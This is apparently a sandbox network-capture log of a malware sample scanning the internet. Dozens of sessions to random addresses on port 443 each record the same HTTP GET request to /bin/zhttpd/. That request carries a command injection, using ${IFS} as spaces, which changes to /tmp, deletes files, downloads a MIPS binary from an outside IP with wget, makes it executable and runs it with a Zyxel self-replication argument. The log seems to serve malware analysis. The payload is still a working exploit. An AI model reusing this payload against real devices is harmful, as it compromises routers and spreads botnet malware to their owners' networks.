                                                  Jan 19, 2024 18:24:15.448174953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9224192.168.2.134418245.195.195.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448215008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9225192.168.2.1350508105.165.199.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448246956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9226192.168.2.1340304143.97.153.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448286057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9227192.168.2.1338796116.27.152.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448332071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9228192.168.2.135071086.5.198.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448385954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9229192.168.2.134234618.180.174.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448419094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9230192.168.2.1341118184.115.68.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448467970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9231192.168.2.1355406202.251.155.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448503017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9232192.168.2.1342868163.73.254.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448565960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9233192.168.2.1343942211.70.50.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448602915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9234192.168.2.1352544107.52.113.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448632956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9235192.168.2.1343860135.178.38.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448685884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9236192.168.2.135587232.21.72.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448745012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9237192.168.2.1350928119.99.38.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448772907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9238192.168.2.1346162174.169.151.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448806047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9239192.168.2.133401851.213.110.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448832035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9240192.168.2.1357660141.75.88.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448872089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9241192.168.2.135937678.99.253.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448909998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9242192.168.2.134071214.195.41.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448950052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9243192.168.2.1344462129.110.113.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452739954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9244192.168.2.1336622118.8.119.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452819109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9245192.168.2.1335898126.245.171.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452869892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9246192.168.2.134165270.63.207.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452879906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9247192.168.2.1332996157.142.83.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452914953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9248192.168.2.135124620.35.191.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452967882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9249192.168.2.133753296.20.48.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.452981949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9250192.168.2.1352880203.129.112.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453037024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9251192.168.2.136000678.2.186.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453093052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9252192.168.2.1353536201.91.204.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453145981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9253192.168.2.13416844.40.215.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453197002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9254192.168.2.1338268195.142.220.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453233004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9255192.168.2.1343648135.228.235.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453274965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9256192.168.2.1351084219.252.152.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453320980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9257192.168.2.1342662219.22.16.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453370094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9258192.168.2.1360108207.206.144.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453401089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9259192.168.2.13404081.115.100.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453448057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9260192.168.2.1351224174.91.151.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453474045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9261192.168.2.133864247.243.23.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453514099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9262192.168.2.1339864170.247.208.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453557968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9263192.168.2.1337428213.150.226.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453588963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9264192.168.2.133961425.111.139.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453655005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9265192.168.2.1351568169.81.115.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453695059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9266192.168.2.1340242173.43.219.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453727007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9267192.168.2.135046647.27.89.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453779936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9268192.168.2.1348264163.216.143.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453830004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9269192.168.2.1352974101.244.123.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453857899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9270192.168.2.13434382.128.48.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453913927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9271192.168.2.134037872.249.122.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453936100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9272192.168.2.1349516151.189.186.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.453974009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9273192.168.2.1344998199.250.217.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454020023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9274192.168.2.1335458196.71.163.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454066038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9275192.168.2.133746075.39.217.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454107046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9276192.168.2.1340832147.24.16.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454154968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9277192.168.2.1353866158.93.54.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454189062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9278192.168.2.1334846195.180.239.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454250097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9279192.168.2.1359976121.40.226.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454291105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9280192.168.2.1354066143.187.166.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454343081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9281192.168.2.13379642.135.242.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454376936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9282192.168.2.1352218205.203.7.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454443932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9283192.168.2.1355326143.44.137.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454463959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9284192.168.2.1334522107.27.178.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454514027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9285192.168.2.1355362212.3.177.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.454555035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9286192.168.2.1347388103.183.56.81443
                                                  TimestampBytes transferredDirectionData
